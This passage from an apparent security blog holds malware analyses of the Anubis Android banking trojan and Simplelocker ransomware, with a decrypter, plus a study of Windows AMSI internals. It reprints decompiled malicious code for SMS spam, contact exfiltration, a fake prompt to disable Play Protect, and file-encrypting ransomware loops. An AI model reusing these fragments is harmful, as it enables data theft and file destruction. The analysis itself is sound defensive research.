        registerReceiver(this.receiver, new IntentFilter("SMS_SENT"));
        return 2;
    }

SMS spam code is implemented in onStartCommand method. it is the method that executes once the service is started. So we can assume that as soon as the service starts, it starts sending spam SMS to the number it receives through the intent. It also retrieves contents for the SMS through the intent (we saw earlier onHandleIntent add those stuff to extras before starting the service).

However to send the SMS messages, it uses another method implemented in SomeHttpClass.

Let’s take a look at that one.

   public void SpamSMS(Context context, String str, String str2) {
        SmsManager smsManager = SmsManager.getDefault();
        ArrayList<String> divideMessage = smsManager.divideMessage(str2);
        PendingIntent broadcast = PendingIntent.getBroadcast(context, 0, new Intent("SMS_SENT"), 0);
        PendingIntent broadcast2 = PendingIntent.getBroadcast(context, 0, new Intent("SMS_DELIVERED"), 0);
        ArrayList<PendingIntent> arrayList = new ArrayList<>();
        ArrayList<PendingIntent> arrayList2 = new ArrayList<>();
        for (int i = 0; i < divideMessage.size(); i++) {
            arrayList2.add(broadcast2);
            arrayList.add(broadcast);
        }
        smsManager.sendMultipartTextMessage(str, null, divideMessage, arrayList, arrayList2);
    }

There’s no need of explainations for this one. It is pretty clear that this one is the method that really sends the SMS messages. Now I’m thinking of changing the name of SomeHttpClass to something more like UtilClass or CrazyShitHappensHere.

after sending the messages, onStartCommand registers a Broadcast receiver, which is in fact, receiver.

Reading Contacts

/* renamed from: wocwvy.czyxoxmbauu.slsa.ncec.wami */
public class Contacts extends Activity {

    public void onCreate(Bundle bundle) {
        super.onCreate(bundle);
        try {

            [... more code]

            if (stringExtra.contains("0")) {
                GetContacts(getContentResolver());
            }

            [... more code]

        } catch (Exception unused) {
            finish();
        }
    }

onCreate method initializes some local variables and calls another method that retrieves contact numbers.

    public void GetContacts(ContentResolver contentResolver) {
        try {
            if (!this.cls.GetSharedPreference(this, "getNumber").equals("true")) {
                Cursor query = contentResolver.query(ContactsContract.CommonDataKinds.Phone.CONTENT_URI, null, null, null, null);
                String str = "(" + this.cls.GetNetworkCountry(this) + ") Numbers from the phone book";
                while (query.moveToNext()) {
                    String string = query.getString(query.getColumnIndex("data1"));
                    String string2 = query.getString(query.getColumnIndex("display_name"));
                    if (!string.contains("*") && !string.contains("#") && string.length() > 6 && !str.contains(string)) {
                        str = str + string + "     " + string2 + "</br>" + '\n';
                    }
                }
                SomeHttpClass bVar = this.cls;
                StringBuilder sb = new StringBuilder();
                sb.append("p=");
                sb.append(this.cls.Encode(this.cls.GetSSAID(this) + "|" + str + "|"));
                bVar.exfiltrate(this, "4", sb.toString());
                this.cls.SetSharedPreference(this, "getNumber", "true");
                finish();
            }
        } catch (Exception unused) {
            finish();
        }
    }

Inside the try block, GetContacts method checks if shared preference getNumber is equal to true. if so, method uses a ContentResolver to retrieve contact number. then it checks if string contatins "*" or "#". it also checks if str, which is essentially the country code is in the retrieved number. if not, it appends str with the number.

Then it sends it to an endpoint /o1o/a6.php. Note the line break () appended to the end of the string. it seems like malware sends data back and forth using html format.

It also sets shared preference value for getNumber to true.

This service also implements a method that sends an SMS to every contact number with SMS body being the SSAID of the device.

Say No to google play protect

When we were reversing the shared preferences, we saw that the malware is capable of disabling google play protect. but it is initially disabled. Since we already know Service1, which was invoked by MainActivity is responsible for enabling and disabling shared preferences, we can take a look aat that.

                                if (new File(dir2, sb4.toString()).exists()) {
                                    try {
                                        if (this.cls.GetSharedPreference(this, "play_protect").equals("true")) {
                                            Intent intent3 = new Intent(this, DisplayGooglePlayProtect.class);
                                            intent3.addFlags(268435456);
                                            intent3.addFlags(1073741824);
                                            startActivity(intent3);
                                        }
                                    } catch (Exception unused5) {
                                        this.cls.mo213a("jtfxlnc", "ERROR getProtect");
                                    }

See?, it cheks if some file or directory exists and calls GetSharedPreference(this, "play_protect"). if the result is equal to true, if creates another activity, named DisplayGooglePlayProtect.

let’s focus on that.

public class DisplayGooglePlayProtect extends Activity {

    [... more code]

    /* access modifiers changed from: protected */
    public void onCreate(Bundle bundle) {
        String str;
        String str2;
        super.onCreate(bundle);
        this.ctx = this;
        try {
            str = this.cls.GetSharedPreference(this, "textPlayProtect");
            try {
                str2 = this.cls.GetSharedPreference(this, "buttonPlayProtect");
            } catch (Exception unused) {
            }

        [... more code]

inside the try block, onCreate method calls GetSharedPreference(this, "textPlayProtect") and assigns returning string to str. inside another nested try block, it calls GetSharedPreference(this, "buttonPlayProtect") and assigns return string to str2.

it looks like those keys refer to some strings that used when asking for permissions.

<string name="textPlayProtect">The system does not work correctly, disable Google Play Protect!</string>
<string name="buttonPlayProtect">Сontinue</string>

        AlertDialog.Builder builder2 = new AlertDialog.Builder(this);
        builder2.setTitle("Google Play Protect").setMessage(str).setIcon(R.drawable.im).setCancelable(false).setNegativeButton(str2, new DialogInterface.OnClickListener() {
            /* class wocwvy.p003x881dce2d.slsa.ncec.ActivityC0062x231814f.DialogInterface$OnClickListenerC00631 */

            public void onClick(DialogInterface dialogInterface, int i) {
                Intent intent = new Intent();
                intent.setClassName("com.google.android.gms", "com.google.android.gms.security.settings.VerifyAppsSettingsActivity");
                try {
                    DisplayGooglePlayProtect.this.startActivity(intent);
                    DisplayGooglePlayProtect.this.ctx.startService(new Intent(DisplayGooglePlayProtect.this.ctx, ServiceC0111x5ad12ef2.class));
                } catch (ActivityNotFoundException unused) {
                    DisplayGooglePlayProtect.this.cls.mo213a("ERROR", "ActPlayProtect");
                }
                dialogInterface.cancel();
            }
        });
        try {
            builder2.create().show();
        } catch (Exception unused3) {
        }

here, it uses previously retreived values to create an AlertBuilder that requests permission to disable google play protect.

Ransomware Mode

We saw it in the manifest that anubis has ransomware capabilities.

public class wahiuolww extends IntentService {

    /* renamed from: a */
    SomeHttpClass cls = new SomeHttpClass();

    /* renamed from: b */
    String str = "";

    /* renamed from: c */
    String str1 = "";

    public wahiuolww() {
        super("wahiuolww");
    }

    public void onHandleIntent(Intent intent) {
        SomeHttpClass bVar;
        String str;
        String str2;
        this.str = this.cls.GetSharedPreference(this, "status");
        this.str1 = this.cls.GetSharedPreference(this, "key");
        File file = new File("/mnt");
        File file2 = new File("/mount");
        File file3 = new File("/sdcard");
        File file4 = new File("/storage");
        this.cls.mo213a("Cryptolocker", "1");
        mo458a(Environment.getExternalStorageDirectory());
        this.cls.mo213a("Cryptolocker", "2");
        mo458a(file);
        this.cls.mo213a("Cryptolocker", "3");
        mo458a(file2);
        this.cls.mo213a("Cryptolocker", "4");
        mo458a(file3);
        this.cls.mo213a("Cryptolocker", "5");

        [... more code]
    }
}

onHandleIntent method initializes strings str and str1 with the values of shared preference "status" and "key". The key might be the encryption key. Then it initializes 4 objects of class File, for "/mnt", "/mount", "/sdcard" and "/storage".

Then it calls another method called mo458a implemented in the same class on each File plus ExternalStorageDirectory().

   public void mo458a(File file) {
        FileOutputStream fileOutputStream;
        try {
            File[] listFiles = file.listFiles();
            for (File file2 : listFiles) {
                if (file2.isDirectory()) {
                    mo459b(file2);
                } 

                [... more code]

The method accepts a File as the first and only parameter. It declares a FileOutputStream variable, then inside the try block, it creates an array of type File named listFiles and initialize the array using listFiles() on the first parameter.

then it iterates through each and every file. if file is directory, it calls itself. it looks like it the method is recursively traversing nodes of the file system.

                else if (file2.isFile()) {
                    try {
                        SomeHttpClass bVar = this.cls;
                        byte[] a = SomeHttpClass.ReadFile(file2);
                        if (this.str.equals("crypt")) {
                            if (!file2.getPath().contains(".AnubisCrypt")) {
                                byte[] a2 = this.cls.rc4encrypt(a, this.str1);
                                fileOutputStream = new FileOutputStream(file2.getPath() + ".AnubisCrypt", true);
                                fileOutputStream.write(a2);
                            }

                [... more code]

else, if it is a file, it calls SomeHttpClass.ReadFile on it and stores the data in a byte array. then it checks if str, which is the global variable that holds the value of shared preference status is equal "crypt". if yes, another nested if statement checks whether current file’s extension is equal to .AnubisCrypt. if yes, it calls SomeHttpClass.rc4encrypt by passing byte array a and str1, which is the key, as arguments. returning byte array is assigned to a new byte array called a2.

Then a new file is created with the same name but .AnubisCrypt appended to the end of it. byte array a2 is then written to the newly created file.

                        } else if (this.str.equals("decrypt") && file2.getPath().contains(".AnubisCrypt")) {
                            byte[] b = this.cls.rc4decrypt(a, this.str1);
                            fileOutputStream = new FileOutputStream(file2.getPath().replace(".AnubisCrypt", ""), true);
                            fileOutputStream.write(b);
                        }

if str (status) is equal to "decrypt" and if current file’s path contains .AnubisCrypt as it’s extension, a byte array b is created and assigned to the return value of SomeHttpClass.rc4decrypt. then a new file is created without the extensionm which will then be fiiled with byte array b.

                        fileOutputStream.close();
                        file2.delete();
                    } catch (Exception unused) {
                    }

then the output stream is closed and file is deleted from the disk.

We can conclude that this method is the on in charge for encrypting and decrypting the file system based on the shared preferene value status.

The end

This is the longest article I have ever typed. hell its over 2000 lines. So eayh, we started analysis with 0 knowledge on a random malware and dissected various part of it using both dynamic and static analysis techniques to understand what it is capable of doing.

with our understanding about the malware, we can conclude that anubis is a very sophisticated banking trojan, and is capable of many things.

#Speard anarchy

Simplelocker, an android ransomware

Thu, 18 Nov 2021 13:07:00 +0000

Table of Content

Introduction

Samples

samples can be obtained from various android malware repositories. I had the dex one but had to get an apk version from the koodous website.

Environment

- linux host with analysis tools
- android vm (API version 16)

Tools

- bytecodeviewer
- apktool
- androgaurd
- adb
- jd-gui 
- enjarify

Dynamic analysis

Before any analysis, I have created some external storages in my VM so we can confirm thisransomware encrypts those files.

Now, we can install the malware on the VM.

after clicking on the installed malware, we get a prompt which contains some text from a language which i beleive to be alien. :) (nah its probably russian…)

Lets try removing the malware using adb.

whoaa whoaa? did we just uninstalled the ransomeware? wow. we are sooo cool. no. not really. remember kid. this is a ransomware. it has probably encrypted every damn file on the device. To make sure, lets check the external storages we created earlier.

Static analysis

Decompiling

first, let’s run apktool on the apk and get the smali code.

I think the issue is with the charset, cause the app uses some weird alien language which i beleived to be russian. I dont know a specific way to solve this problem so im gonna try updating the tool.

Well it didnt work.

Dont lose your hopes comrad i got a way around this. we can use jd-gui!!! However to do so, we need to convert .apk file to a .jar file.

enjarify is a nice tool to do this. here’s a link to the github repo : https://github.com/google/enjarify.git

λ rxOred-aspiree simplelocker → enjarify simplelocker.apk 
Using python3 as Python interpreter
1000 classes processed
2000 classes processed
Output written to simplelocker-enjarify.jar
2693 classes translated successfully, 0 classes had errors

here is the result :)

Now, lets see what jd-gui got for us.

Main

here we can see Main, which i think is the main activity. if you dont know what it is, refer an android development guide.

here we can see a call to requestWindowFeature() function, which is used to exclude or include various window features such as toolbar, actionbar and so on. In this case, i honestly dont know what the parameter means (well yes ik its a constant).

then onCreate invokes setFlags() with E as an argument. then it sets content view to some random looking value.

Then there is a juicy part. it calls startService function, which is used to start a long running service as the name implies.

we can see the definition of that function right above the onCreate().

Here it checks if MainService.isRunning is true, and then it does some calls to constructors and stuff like that. we’ll come back to this later

Now let’s examine whats in the MainService().

whoa whoa whoaaa. this is scary ryt? we got some tor shit going on here.

Let’s examine, onCreate function.

as we can see, this one creates a ScheduleExecutorService class and calls newSingleThreadScheduledExecutor

ScheduledExecutorService scheduledExecutorService = Executors.newSingleThreadScheduledExecutor();

ScheduleExecutorService is an ExecutorService which can schedule different tasks to run periodically. This makes sense cause when we first run the malware, we get that ugly windo w and it was continuasly displayed on the screen periodically until we uninstall the malwa re.

MainService$3 mainService$3 = new MainService$3();
this(this);
TimeUnit timeUnit = TimeUnit.SECONDS;
scheduledExecutorService.scheduleAtFixedRate(mainService$3, 0L, 180L, timeUnit);

here, onCreate function creates mainService$3 and schedule it to execute repeatedly for a fixed rate.

Just like the one above, onCreate creates mainService4 and do the same with it.

then..

Thread thread = new Thread();
MainService$5 mainService$5 = new MainService$5();
this(this);
this(mainService$5);
thread.start();

here, onCreate function creates a thread, another service called mainService$5 and start new service within the newly created thread.

What we know so far

Summurizing what we know so far, first we finds out that this apk cant be decompiled into smali code using apktool. Then we tried with jd-gui and we were successful.

About the code, we found out that Main function calls startService which in turn initialize MainService. There, MainService initialize MainService$3 && mainService$4 to run periodically. Then it starts another thread and run MainService$5.

Encryption

Now let’s look at MainService$5.

See? we got what we wanted. This is the class that encrypts our files.

First it creates a FilesEncryptor object. Then it calls filesEncryptor.encrypt(). There’s some exception handling too. if the encryption fails, it sets up some debugging messages and call Log.d

lets take a look at FilesEncryptor class.

ah yes! the files my friend, the files. here we can see the class has two array members, first one for files-to-be-decrypted and second one for the files-to-be-ecrypted.

then there is another member for shared preferences.

here the function creates an ArrayList and asign it to filesToEncrypt && filesToDecrypt we previously saw. next few lines

String[] arrayOfString = new String[1];
arrayOfString[0] = "enc";
List<String> list = Arrays.asList(arrayOfString);
this.extensionsToDecrypt = list;
SharedPreferences sharedPreferences = paramContext.getSharedPreferences("AppPrefs", 0);
this.settings = sharedPreferences;
String str = Environment.getExternalStorageDirectory().toString();
File file = new File();
this(str);

what the above snippet does is, fist it creates a string array and then set 1st element (0) to “enc”. Then the string array is assigned to List<String> list, which then assigned to extensionsToDecrypt. So all above snippet does is, creating assigning a List of extensions so that malware can decrypt only those that it previously encrypted.

then we can see FilesEncryptor calls getFileNames().

Well..Im not gonna take a look at that one cause, all it does is get filenames. And we dont have to give a shit how it does that. However keep in mind that this is the one that appends filesToEncrypt ArrayList.

Now lets go back to mainService$5. As we saw earlier, this is the function which calls FilesEncryptor.encrypt().

I mean dude, i you got two holes in your face filled with two testical like balls, you can clear see the key and the algorithm. And that’s all you want to decrypt your files.

Anyway, lets analyze this one… first there is an if statement which check if sharedPreferences contains str1, which is “FILES_WAS_ENCRYPTED”. then the next if statement checks whether is it possible to write to external storages using isExternalStorageWritable().

AesCrypt aesCrypt = new AesCrypt();
this("jndlasf074hr");

then we can see above snippet, which initialize an AesCrypt object and pass the key jndlasf074hr.

then it creates an iterator to filesToEncrypt and iterates through each file.

in the loop, if current one does not have a next, function sets sharedPreferences to “FILES_WAS_ENCRYPTED”.

str2 = ".enc";
String str3 = stringBuilder.append(str2).toString();
aesCrypt.encrypt(str4, str3);
File file = new File();
this(str4);
file.delete();

Again, a string is assigned with “.enc”. Now this looks like an extension too. So my guess previous one is for folders/directories and this one is for files.

then str3 is assigned with a string with str2 appended and is passed to aesCrypt.encrypt() function alongside with str4

String str4 = sharedPreferences1.next();

which is shown in the above snippet.

then a new file is created passing str4 as the argument and then deleted. So this one is basically a loop that encrypts every file that is specified in the filesToEncrypt ArrayList and deletes the original one.

Cool. Now we have dissected the encryption part. Now lets take a look at decryption part.

Decryption

Since we have already analyzed main parts of the code, this is going to be easy.

Just like the encrypt, this one too, check whether external storagesis writable. if true, an AesCrypt object is constructed and passed the key as an argument.

oh yeah an iterator is also created.

then there is a while loop, which again checks whether if iterator.hasNext() is true. if true, str1 is assigned with iterator.next() and str2 is with “.”.

then we have int i, which is initialized with str1.substring(0, i) both are then passed to aesCrypt.decrypt() function to decrypt the file.

then the file named with str1 is deleted and loop continued.

Now, that’s all we need to decrypt the files!!!. However feel free to take a look at AesCrypt if you want.

Other stuff

Since we are done with the encryption part, let’s see what does this thing do with tor. First of all, goal here is not to dissect everything but to find anything useful for host-based / network signatures.

So what looks juicy for me is Constants.class

Holy shit. i should have analyzed this one before the other functions. this one gives us the key in plain.

see? we got the file extensions that this ransomware encrypts (if you have analyzed getFileNames, this must be familiar to you…

Now pay your attention to the first constant defined in the class ADMIN_URL. This sounds like a CnC server address. this is a good network based indicator. http://xeyocsu7fu2vjhxs.onion/.

Writing a decrypter

Since we know how the ecnryption and decryption works, we can write an app that can decrypt all the files. I’ll leave a snippet down below and you can copy it to android studio.

package com.example.decrypter;

import androidx.appcompat.app.AppCompatActivity;

import android.content.SharedPreferences;
import android.os.Bundle;
import android.os.Environment;
import android.view.View;

import java.io.File;
import java.io.IOException;
import java.io.UnsupportedEncodingException;
import java.security.InvalidAlgorithmParameterException;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Iterator;
import java.util.List;

import javax.crypto.NoSuchPaddingException;

public class MainActivity extends AppCompatActivity {

    private ArrayList filesToDecrypt;
    private List<String> extensionsToDecrypt;
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
    }

    public void onClick(View view) {
        this.filesToDecrypt = new ArrayList();
        String[] arrayOfString = new String[1];
        arrayOfString[0] = "enc";
        this.extensionsToDecrypt = Arrays.asList(arrayOfString);
        File file = new File(Environment.getExternalStorageDirectory().toString());
        getFileNames(file);
        try {
            decrypt();
        } catch (NoSuchPaddingException e) {
            e.printStackTrace();
        } catch (NoSuchAlgorithmException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (InvalidAlgorithmParameterException e) {
            e.printStackTrace();
        } catch (InvalidKeyException e) {
            e.printStackTrace();
        }
    }

    private void getFileNames(File paramFile) {
        File[] arrayOfFile = paramFile.listFiles();
        for (int i = 0;; i++) {
            int k = arrayOfFile.length;
            if (i >= k)
                return;
            String absolutePath = paramFile.getAbsolutePath();
            String fileName = arrayOfFile[i].getName();
            File file = new File(absolutePath, fileName);
            boolean isDirectory = file.isDirectory();
            if (isDirectory) {
                File[] arrayOfFile1 = file.listFiles();
                if (arrayOfFile1 != null) {
                    // if a directory, get names of files inside it recursively
                    getFileNames(file);
                    continue;
                }
            }
            // if not a directory
            String str3 = file.getAbsolutePath();
            String subStr = str3.substring(str3.lastIndexOf(".") + 1);
            List<String> list = this.extensionsToDecrypt;
            // if pathname contains .enc
            boolean bool1 = list.contains(subStr);
            if (bool1) {
                list = this.filesToDecrypt;
                fileName = file.getAbsolutePath();
                list.add(fileName);
            }
            continue;
        }
    }

    private boolean isExternalStorageWritable() {
        String ext = Environment.getExternalStorageState();
        String mounted = "mounted";
        boolean isMounted = mounted.equals(ext);
        if (isMounted)
            return true;
        isMounted = false;
        mounted = null;
        return isMounted;
    }

    public void decrypt() throws NoSuchPaddingException, NoSuchAlgorithmException, IOException, InvalidAlgorithmParameterException, InvalidKeyException {
        boolean isWritable = isExternalStorageWritable();
        if (isWritable) {
            AesCrypt aesCrypt = new AesCrypt("jndlasf074hr");
            Iterator<String> iterator = this.filesToDecrypt.iterator();
            while (true) {
                boolean hasNext = iterator.hasNext();
                if (hasNext) {
                    String inputFileName = iterator.next();
                    hasNext = false;
                    int i = inputFileName.lastIndexOf(".");
                    String outputFileName = inputFileName.substring(0, i);
                    aesCrypt.decrypt(inputFileName, outputFileName);
                   File file = new File(inputFileName);
                    file.delete();
                    continue;
                }
                return;
            }
        }
    }
}

oh and just copy the contents of the AesCrypt.class from jd-gui. then build it and install the app on the android VM.

yae yae ik. Im not a UI designer or an android developer.

The end

So yeah i think that’s it.

#Speard Anarchy!

From AMSI to Reflection 0x0

Sat, 23 Oct 2021 14:20:04 +0000

Table of Content

Introduction

In Windows environments, in both initial access and post-exploitation phases, script-based malware plays a major role. Often, hackers utilize microsoft office suite to gain initial access (using droppers, loaders) to the victim and Windows powershell to explore internal network, perform scans… basically to do the post exploitation stuff. (well of course, there are powershell based droppers.)

There is something that is common to both of these tools. Windows scripting engine.

And as a result, Microsoft and antimalware vendors have developed many security mechanisms to deal with those threats that utilize script-based malware. For example, modern anti-malware solutions can statically analyze scripts, binaries and detect whether they are malicious or not using signatures such as strings.

And because of that, malware authors use various techniques to bypass those defense mechanisms. One of the major techniques is code obfuscation.

consider the following example, that I took from MSDN.

    function displayEvilString
    {
        Write-Host 'pwnd!'
    }

Assuming the above PowerShell snippet is malicious, we can write a signature to detect the malware. this signature can be Write-Host 'pwnd!' or simply 'pwnd!'.

So to avoid signature-based detection, the above snippet can be obfuscated like shown below.

    function obfuscatedDisplayEvilString
    {
        $xorKey = 123
        $code = "LHsJexJ7D3see1Z7M3sUewh7D3tbe1x7C3sMexV7H3tae1x7"
        $byte = [Convert]::FromBase64String($code)
        $newBytes = foreach($byte in $bytes) {
            $byte -bxor $xorKey
        }
        $newCode = [System.Text.Encoding]::Unicode.GetString($newBytes)
    }

And this is a win for malware authors since this is beyond what anti-malware solutions can emulate or detect until AMSI joins the conversation.

Antimalware Scan Interface

Antimalware Scan Interface, AMSI for short is a standard interface that allows applications to interact with anti-malware products installed on the system. This means is that it provides an API for Application developers. Application developers can use the API to implement security features to make sure that the end-user is safe.

AMSI also enables anti malware vendors to defend againts script based malware.

According to Microsoft, AMSI provides the following features by default.

-   User Account Control
-   PowerShell
-   Windows Script Host
-   JScript && VBScript
-   Office VBA macros

As it is clear from those default features, AMSI specifically provides anti-malware security mechanisms to defend against script-based malware.

AMSI in action

So let’s take Safetykatz as our example.

When we run the binary, the result we get is.

See, as we expected, PowerShell stops the execution of the program once it has detected the program is suspicious using AMSI. So, how can we bypass this?, well before that, we have to dive deep into AMSI internals to understand how things work.

AMSI internals

As I previously mentioned, AMSI enables anti malware vendors to defend againts script based malware. This is done by using AMSI providers. An AMSI provider is basically a COM object that implements IAntimalwareProvider COM interface. An anti malware vendor who’s willing to implement AMSI interface should then register the COM object by creating a CLSID entry in HKLM\CLSID and registering the same CLSID under HKLM\Software\Microsoft\AMSI\Providers\.

As it is shown in the above diagram, AMSI provides a dll called amsi.dll for application developers to interfere with AMSI providers indirectly.

Let’s examine PowerShell from process hacker to check whether amsi.dll is loaded.

as we can see, amsi.dll has been loaded into powershell.exe. Now, let’s take a look at this dll in-depth and see if we can find anything interesting. Even without looking at the dll, it is possible to think of some techniques to bypass AMSI, Anyway, its time to dig deep.

Before start reading disassembly, let’s examine the export table of amsi.dll.

Out of the above exported functions, only two are important to us.

-   AmsiInitialize
-   AmsiScanBuffer
-   AmsiScanString

Of course there are some other important exports. To name a few, DllRegisterClass, DllGetClassObject and AmsiUacScan.

First we’ll go through AmsiScanBuffer.

AmsiScanString

Microsoft documentation does not tell us much about AmsiScanString function. However it gives some basic information about it. Such as,

it’s prototype,

HRESULT AmsiScanString(
  [in]           HAMSICONTEXT amsiContext,
  [in]           LPCWSTR      string,
  [in]           LPCWSTR      contentName,
  [in, optional] HAMSISESSION amsiSession,
  [out]          AMSI_RESULT  *result
);

and parameter information.

According to the documentation, The first parameter this function accepts is
amsiContext, which is a handle of type HAMSICONTEXT that was initially received from AmsiInitialize.

Second and third parameters hold pointers to wide character strings. first one for the string that should be scanned and the latter for the contentName.

contentName can be either filename, script id, url or similar of the content being scanned.

Fourth parameter is marked optional, however if multiple scan requests are to be correlated within a session, this parameter should be set to the handle returned by AmsiOpenSession function.

Fifth parameter is an output parameter and this is the one that indicates whether the input string is malicous or not.

As MSDN says, this function (and AmsiScanBuffer) returns S_OK if the call is successful. However, the return value does not indicate whether the buffer is malicious. instead, the function uses fifth parameter of type AMSI_RESULT to send the scan results to caller.

    typedef enum AMSI_RESULT {
        AMSI_RESULT_CLEAN,
        AMSI_RESULT_NOT_DETECTED,
        AMSI_RESULT_BLOCKED_BY_ADMIN_START,
        AMSI_RESULT_BLOCKED_BY_ADMIN_END,
        AMSI_RESULT_DETECTED
    } ;

Let’s a take a look at AmsiScanString in disassembly.

Function allocates some space in the stack and checks if the string is empty or not. If string turns out to be empty, it simply returns after loading 0x80070057 into rax.

if string to be scanned is not null,

function checks if result is null pointer. if so, well the same thing as above, it returns with bad value loaded into rax.

else, result is valid, it loops through each wide character of the string to get the length of it.

After getting the string length, it calls AmsiScanBuffer function.

It is clear that this is just a simple wrapper function around AmsiScanBuffer.

AmsiScanBuffer

According to the MSDN and as well as the name suggests, the AmsiScanBuffer function scans a buffer for malicous content.

here is the function prototype msdn

    HRESULT AmsiScanBuffer(
      [in]           HAMSICONTEXT amsiContext,
      [in]           PVOID        buffer,
      [in]           ULONG        length,
      [in]           LPCWSTR      contentName,
      [in, optional] HAMSISESSION amsiSession,
      [out]          AMSI_RESULT  *result
    );

Function takes 6 parameters. One of which is the pointer to the AMSI_RESULT enum which i explained above - *result. According to MSDN, others include a buffer, which will be scanned by the anti-malware vendor - buffer, length of the buffer - length, filename, URL, unique script ID - contentName and a handler to the session - HAMSISESSION structure.

And here’s how this function looks like in disassembly.

here we can see stack pointer is stored in r11 register and since this is x64 _stdcall, the first four parameters are stored in rcx, rdx, r8 and r9 registers. Rest are stored in the stack. With that information, we can assume a pointer to the AMSI_RESULT enum is stored in the stack.

then we can see few comparisons around global data. if the comparisons turns out to be successful, it calls WPP_SF_qqDqq function. (windows sofware trace preprocessor).

then there is a pretty huge if condition, which is essentially checks if any of the above parameters are invalid

by looking at the comparison, the function won’t successfully return if [rbp], which is the first qword of amsiContext is not equal to 0x49534d41.

And if parameters invalid, it returns 0x80070057 (which i think is the bad return value)

else, as we can see in the above snippet, buffer (rdx register) is now loaded with address of CAmsiBufferStream::vftable and stored the value in the stack. This may sound familiar to anyone who has done some C++ reverse engineering since this is a one way to represent constructor calls in assembly (setting vtable to the object’s first bytes).

to confirm that we can take a look at CAmsiBufferStream::vftable.

as we can see, CAmsiBufferStream::vftable is indeed, a virtual function table and what those two instructions doing is creating an object of type CAmsiBufferStream. It is also possible to see some member variable intializations too.

My assumption is that amsiContext->thirdMember is somekind of a class that anti-malware vendor has registered to perform scans.

To make sure our assumptions so far are correct, we’ll go over this function using windbg.

Since we already know interesting parts of the function, it is easy to place breakpoints.

0:018> bl
     0 e Disable Clear  00007ffxxxxx3310     0001 (0001)  0:**** amsi!AmsiScanBuffer
     1 e Disable Clear  00007ffxxxxx338d     0001 (0001)  0: amsi!AmsiScanBuffer+0x7d
     2 e Disable Clear  00007ffx`xxxx3395     0001 (0001)  0: amsi!AmsiScanBuffer+0x85
     3 e Disable Clear  00007ffxxxx339e     0001 (0001)  0:**** amsi!AmsiScanBuffer+0x8e
     4 e Disable Clear  00007ffxxxxx33ac     0001 (0001)  0:** amsi!AmsiScanBuffer+0x9c

First few breakpoints are placed at locations in assembly where amsiContext’s member variables are being referenced. Reason being this handle is still unknown to us. Therefore it could be useful to extract every possible information about it. Last breakpoint is placed at the address where CAmsiBufferStream:vftable is referenced.

So from the above image, we can assume that the first member of the amsiContext is a QWORD but it compares it with a DWORD and second and third members are also QWORDs (8 bytes).

0:018> dq /c1 0x000002347f5d44d8 L1
000002347f5d44d8  000002347e90cce0
0:018> dq /c1 0x000002347f5d44e0 L1
000002347f5d44e0  000002347eb5d120

We can refer to the memory map to get more information about what those QWORDs are.

Now it is clear those two pointers are from heap segment 1. However, we still have no idea about the type of those pointers.

However we already know those are pointers to objects thanks to our previous static analysis.

Above screenshot shows the virtual function table of CAmsiBufferStream.

Then the next address where we can find some more information regarding amsiContext members is,

00007ff9455033d6 488b01           mov     rax, qword ptr [rcx] ds:000002347eb5d120={amsi!ATL::CComObject<CAmsiAntimalware>::vftable' (00007ff94550bb48)}
00007ff9455033d9 488b4018         mov     rax, qword ptr [rax+18h]
00007ff9455033dd ff15cd8d0000     call    qword ptr [amsi!_guard_dispatch_icall_fptr (00007ff9`4550c1b0)]

in the above snippet, rcx holds one of those pointers we just discussed, 000002347eb5d120 (thirdMember). In the first instruction, 64 bit value at that address is loaded into rax register, which, according to the above snippet, is 00007ff94550bb48. It also specifies that this is a vtable located in .rodata section of the asmi.dll’s memory image.

next two instructions retreives address 0x18 offset from the vtable into rax register and calls the address stored in rax

This proves that our assumption on function pointer extracted from the HAMSICONTEXT being a anti-malware vendor’s registered function is false and it is a pointer to amsi!CAmsiAntimalware::Scan method.

We have uncovered some important details about HAMSICONETXT so far. We already know that the first member is a DWORD, and it should be equal to 0x49534d41 in order for scan to be successful. Third member is a pointer to an object of class CAmsiAntimalware, which has a virtual function called amsi!CAmsiAntimalware::Scan.

And by moving its 0x0 offset rax register, we can access it’s virtual function table where we can find Scan at the 0x18.

The whole thing can be roughly decompiled down into below C code.


    class CAmsiAntimalware {
        private:
            [...]
        
        public:
            virtual Scan(CAmsiBufferStream *, AMSI_RESULT, DWORD);

            [...]
    }

    typedef HAMSICONTEXT {
        QWORD               unk1;
        QWORD               *secondMember;
        CAmsiAntimalware    *antimalware;

        [...]
    };

    HRESULT __stdcall AmsiScanBuffer
    (
            HAMSICONTEXT amsiContext, 
            PVOID buffer, 
            ULONG length, 
            LPCWSTR contentName, 
            HAMSISESSION amsiSession, 
            AMSI_RESULT *result
    )
    {
        auto var;
        if ((WPP_GLOBAL_Control != &WPP_GLOBAL_Control) && (*(WPP_GLOBAL_Control + 0x1c)) != 4))
        {
            WPP_SF_qqDqq(
                *((BYTE*)WPP_GLOBAL_Control + 0x10), 
                buffer, 
                length, 
                amsiContext, 
                buffer, 
                amsiSession, 
                result
            );
        }

        if (
                buffer == NULL || 
                result == NULL || 
                amsiContext == NULL || 
                *((DWORD *)amsiContext) != 0x49534D41 || 
                *((QWORD *)amsiContext + 1) == 0x0 || 
                *((QWORD *)amsiContext+2) == 0x0
            ) 
        {
            return 0x80070057;    
        } 
        else 
        {
            CAmsiBufferStream bufferStream = CAmsiBufferStream(
                buffer, 
                length, 
                amsiContext->secondMember,
                contentName,
                session
            ); 

            return amsiContext->antimalware->Scan(
                amsiContext->antimalware, // this
                &bufferStream, // CAmsiBufferStream *
                result,
                0
            );
        }
    }

We are not done yet. Goal here is to understand how AMSI works. Therefore, our next target is amsi!CAmsiAntimalware::Scan.

But before drill down into it, we need to construct the HAMSICONTEXT structure out of the knowlegde we have.

now we can see decompiler output is much more accurate and readable.

We can also try constructing a CAmsiAntimalware class but we dont have enough information to populate member variables.

CAmsiAntimalware::Scan

So ghidra has created a nice view of the stack frame for us. And by looking at the parameters, we see the function expects a pointer to an IAmsiBuffer object and a pointer to a pointer of IAntimalwareProvider object.

We saw that in the AmsiScanBuffer that this value is set to zero.

Then continues to setup all those memory curruption protection machanisms and to check the validity of the input parameters. First it checks if third parameter, result is null (remember, result is a pointer to AMSI_RESULT enum).

